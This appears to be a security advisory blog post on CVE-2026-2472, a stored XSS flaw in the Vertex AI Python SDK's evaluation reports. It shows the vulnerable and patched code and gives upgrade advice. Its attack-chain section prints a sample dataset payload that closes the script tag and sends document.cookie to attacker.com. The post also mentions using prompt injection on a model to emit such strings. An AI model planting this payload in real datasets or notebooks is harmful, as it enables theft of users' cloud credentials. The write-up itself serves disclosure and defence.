Feb 20, 2026·6 min read·9 visits
The Vertex AI SDK for Python (v1.98.0 - v1.130.0) unsafely embedded JSON data into HTML reports. Attackers can inject malicious scripts into datasets or model outputs, which execute when a victim visualizes the evaluation results in Jupyter/Colab. Upgrade to 1.131.0 immediately.
A critical Stored Cross-Site Scripting (XSS) vulnerability in the Google Cloud Vertex AI Python SDK allows attackers to execute arbitrary JavaScript within a victim's Jupyter or Colab environment. By poisoning model evaluation datasets, an attacker can hijack the visualization rendering process to exfiltrate credentials or manipulate notebook sessions.
In the modern AI landscape, the Jupyter Notebook is the new shell. Data scientists and ML engineers live inside these environments, processing massive datasets and visualizing complex model behaviors. We trust these environments implicitly. We assume that when we ask a library to "draw a graph of this model's performance," it will do just that—draw a graph.
But what if the graph bites back? CVE-2026-2472 is exactly that scenario. It resides in the google-cloud-aiplatform SDK, specifically within the _genai/_evals_visualization component. This tool is designed to take raw evaluation data—prompts, responses, and metrics—and render them into a pretty HTML report right inside your notebook.
The vulnerability is a classic case of "Web 1.0 problems in Web 3.0 technologies." The SDK takes data that is potentially tainted (like model outputs or external datasets) and blindly trusts it during HTML generation. If you think XSS is just for websites, think again. In a notebook environment, XSS isn't just an alert box; it's a potential gateway to your cloud credentials.
The root cause here is embarrassingly simple, yet devastatingly effective. The developers used Python f-strings to construct HTML templates. While f-strings are great for performance and readability, they are catastrophic for security when handling untrusted input destined for a browser context.
The vulnerable code in _get_evaluation_html looked something like this:
def _get_evaluation_html(eval_result_json: str) -> str:
return f"""
<html>
<body>
<script>
const data = {eval_result_json};
renderChart(data);
</script>
</body>
</html>
"""See the problem? The code assumes eval_result_json is a safe JSON string. The browser's HTML parser runs before the JavaScript engine. If the JSON string contains </script>, the HTML parser sees that tag and immediately closes the script block, treating whatever follows as raw HTML.
This is the classic "context confusion" bug. The Python code treats the data as a string, but the browser treats it as structural markup. By breaking out of the script context, an attacker can inject their own <script> tags, effectively turning a data visualization tool into a remote code execution platform within the victim's browser.
Let's look at the fix (Commit 8a00d43dbd24e95dbab6ea32c63ce0a5a1849480) to understand exactly how Google patched this. They moved from direct interpolation to a Base64-encoding strategy.
The Vulnerable Code (Simplified):
# _genai/_evals_visualization.py
template = """
<script>
var vizData = {json_payload};
</script>
"""
return template.format(json_payload=json.dumps(data))The Fixed Code:
# _genai/_evals_visualization.py
import base64
def _encode_to_base64(data: str) -> str:
return base64.b64encode(data.encode("utf-8")).decode("utf-8")
# ... inside the template generator ...
payload_b64 = _encode_to_base64(json.dumps(data))
template = """
<script>
const b64 = "{payload_b64}";
const jsonStr = new TextDecoder().decode(
Uint8Array.from(atob(b64), c => c.charCodeAt(0))
);
var vizData = JSON.parse(jsonStr);
</script>
"""By Base64 encoding the payload on the server (Python side) and decoding it on the client (JavaScript side), the data creates a "tunnel" through the HTML parser. The browser only sees alphanumeric Base64 characters, so tags like </script> never appear in the DOM during the initial parse phase. It's a robust, standard defense against this specific class of XSS.
To exploit this, we don't need to hack a server directly. We just need to poison the data supply chain. Imagine you are evaluating a Large Language Model (LLM) and you download a "standard" evaluation dataset from a public repository, or perhaps you prompt injection the model to output specific strings.
Here is the attack chain:
{
"prompt": "Explain quantum physics",
"response": "</script><script>fetch('https://attacker.com/steal?c='+btoa(document.cookie))</script>"
}vertexai.preview.generative_models.evaluation to see how well their model performed. The SDK generates the HTML.This is particularly dangerous in cloud-hosted notebooks (like Colab or Vertex AI Workbench) where the browser session often holds authentication tokens for the cloud provider. A successful XSS here could allow an attacker to pivot from a simple visualization bug to full cloud account compromise.
While the main visualization vector was patched in version 1.131.0, a closer look at the codebase suggests the battle might not be entirely over. The patch focused heavily on the eval_result_json variable, but other functions like _get_status_html still use string interpolation for error messages.
def _get_status_html(status: str, error_message: Optional[str] = None) -> str:
return f"""
<div>
<p><b>Status:</b> {status}</p>
{error_message}
</div>
"""If an attacker can force the evaluation engine to throw an error that contains user-controlled input (for example, a malformed prompt that gets reflected in the error log), they might still be able to achieve XSS. This serves as a reminder that fixing the known vector is rarely enough; you have to sanitize the pattern, not just the instance. Always treat error messages as untrusted input.
The mitigation is straightforward: stop using the vulnerable versions. The patch was released in version 1.131.0 on December 16, 2025. If you are running anything between 1.98.0 and 1.130.0, you are exposed.
Run this in your environment immediately:
pip install --upgrade google-cloud-aiplatform>=1.131.0If you cannot upgrade for compatibility reasons (classic Python dependency hell), you must avoid using the visualization features of the Vertex AI SDK on untrusted data. Treat all evaluation results as radioactive material until they are sanitized.
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/U:Amber| Product | Affected Versions | Fixed Version |
|---|---|---|
google-cloud-aiplatform Google | >= 1.98.0, < 1.131.0 | 1.131.0 |
| Attribute | Detail |
|---|---|
| CVE ID | CVE-2026-2472 |
| CVSS v4.0 | 8.6 (High) |
| CWE | CWE-79 (Stored XSS) |
| Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H |
| Affected Versions | 1.98.0 - 1.130.0 |
| Fix Version | 1.131.0 |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')